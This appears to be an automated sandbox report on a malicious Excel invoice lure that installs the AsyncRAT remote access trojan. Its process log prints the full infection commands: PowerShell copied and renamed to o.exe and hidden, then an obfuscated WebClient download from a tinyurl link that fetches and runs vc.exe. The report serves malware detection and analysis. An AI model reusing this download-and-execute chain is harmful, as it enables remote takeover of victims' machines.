Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://tasks.office.com
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com
Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/y3m5fwhq
Source: o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com4
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://wus2-000.contentsync.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: o.exe, 0000000E.00000002.397318016.00000000055BA000.00000004.00000001.sdmp, vc.exe.14.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: 32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Source: Yara match	File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Document image extraction number: 0	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0	Screenshot OCR: Enable Content"
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1	Screenshot OCR: Enable Content"

Found Excel 4.0 Macro with suspicious formulas

Source: 1099008FEDEX_090887766.xls

Initial sample: EXEC

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01258D90		14_2_01258D90
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01258C90		14_2_01258C90
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_01257732		14_2_01257732
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_012590D0		14_2_012590D0
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337E830		14_2_0337E830
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 17_2_00EBCE60		17_2_00EBCE60
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_02ACE4A0		32_2_02ACE4A0
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_02ACE4B0		32_2_02ACE4B0
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_02ACC53C		32_2_02ACC53C
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_07232E61		32_2_07232E61
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_07232E70		32_2_07232E70

Document contains embedded VBA macros

Source: 1099008FEDEX_090887766.xls

OLE indicator, VBA macros: true

Enables security privileges

Source: C:\Windows\SysWOW64\Robocopy.exe

Process token adjusted: Security

Jump to behavior

PE file contains strange resources

Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: powershell.exe.7.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\AppData\Roaming\vc.exe

Section loaded: amsidll.dll

Yara signature match

Source: 1099008FEDEX_090887766.xls, type: SAMPLE

Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: vc.exe.14.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

.NET source code contains calls to encryption/decryption functions

Source: vc.exe.14.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.14.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: vc.exe.14.dr, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.2.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 32.0.vc.exe.780000.0.unpack, u0006/u0006.cs	Cryptographic APIs: 'TransformFinalBlock'

Classification label

Source: classification engine

Classification label: mal96.troj.expl.evad.winXLS@31/25@2/2

Contains functionality for error logging

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_012590D0 FormatMessageW,LocalFree,GetLastError,FormatMessageW,free,LocalFree,free,free,

14_2_012590D0

Contains functionality to instantiate COM classes

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125C231 __EH_prolog3_GS,CoInitialize,CoCreateInstance,CoUninitialize,

14_2_0125C231

Contains functionality to load and extract PE file embedded resources

Source: C:\Users\user\AppData\Local\Temp\o.exe

Code function: 14_2_0125D547 FindResourceExW,LoadResource,

14_2_0125D547

Creates files inside the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5076:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_01

Creates temporary files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{FE3D55F8-EE7F-4F13-A134-D11201796DC7} - OProcSessId.dat

Jump to behavior

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Source: 1099008FEDEX_090887766.xls

OLE indicator, Workbook stream: true

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\vc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Reads ini files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\SysWOW64\Robocopy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Users\user\AppData\Local\Temp\o.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: 1099008FEDEX_090887766.xls

ReversingLabs: Detection: 14%

Spawns processes

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\o.exe	Process created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe

Uses an in-process (OLE) Automation server

Source: C:\Users\user\AppData\Local\Temp\o.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Temp\o.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: powershell.pdbUGP source: o.exe, 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, o.exe, 00000010.00000002.390755683.0000000001251000.00000020.00020000.sdmp, o.exe, 00000011.00000000.252577603.0000000001251000.00000020.00020000.sdmp, powershell.exe.7.dr
Source:	Binary string: powershell.pdb source: o.exe, 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, o.exe, 00000010.00000002.390755683.0000000001251000.00000020.00020000.sdmp, o.exe, 00000011.00000000.252577603.0000000001251000.00000020.00020000.sdmp, powershell.exe.7.dr

Data Obfuscation:

Binary contains a suspicious time stamp

Source: initial sample

Static PE information: 0x9203324E [Sat Aug 17 19:30:22 2047 UTC]

Obfuscated command line found

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0125A58B push ecx; ret		14_2_0125A59E
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0125A239 push ecx; ret		14_2_0125A24C
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337BE60 push es; ret		14_2_0337BE76
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337BEA0 push es; ret		14_2_0337BEB6
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337BE80 push es; ret		14_2_0337BE96
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 14_2_0337BEC2 push es; ret		14_2_0337BED6
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 17_2_00EBC5E0 push es; ret		17_2_00EBC5F0
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 17_2_00EBD9E0 push es; ret		17_2_00EBD9F0
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_007A07D8 push es; ret		32_2_007A0C96
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_072375E8 push E803B477h; iretd		32_2_072375ED
Source: C:\Users\user\AppData\Roaming\vc.exe	Code function: 32_2_07237A05 push eax; ret		32_2_07237A06

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 7.71178527327

Persistence and Installation Behavior:

Drops PE files to the document folder of the user

Source: C:\Users\user\AppData\Local\Temp\o.exe

File created: C:\Users\user\Documents\vc.exe

Jump to dropped file

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\o.exe	File created: C:\Users\user\Documents\vc.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\Robocopy.exe	File created: C:\Users\user\AppData\Local\Temp\powershell.exe			Jump to dropped file

Boot Survival:

Yara detected AsyncRAT

Source: Yara match	File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\o.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\Robocopy.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
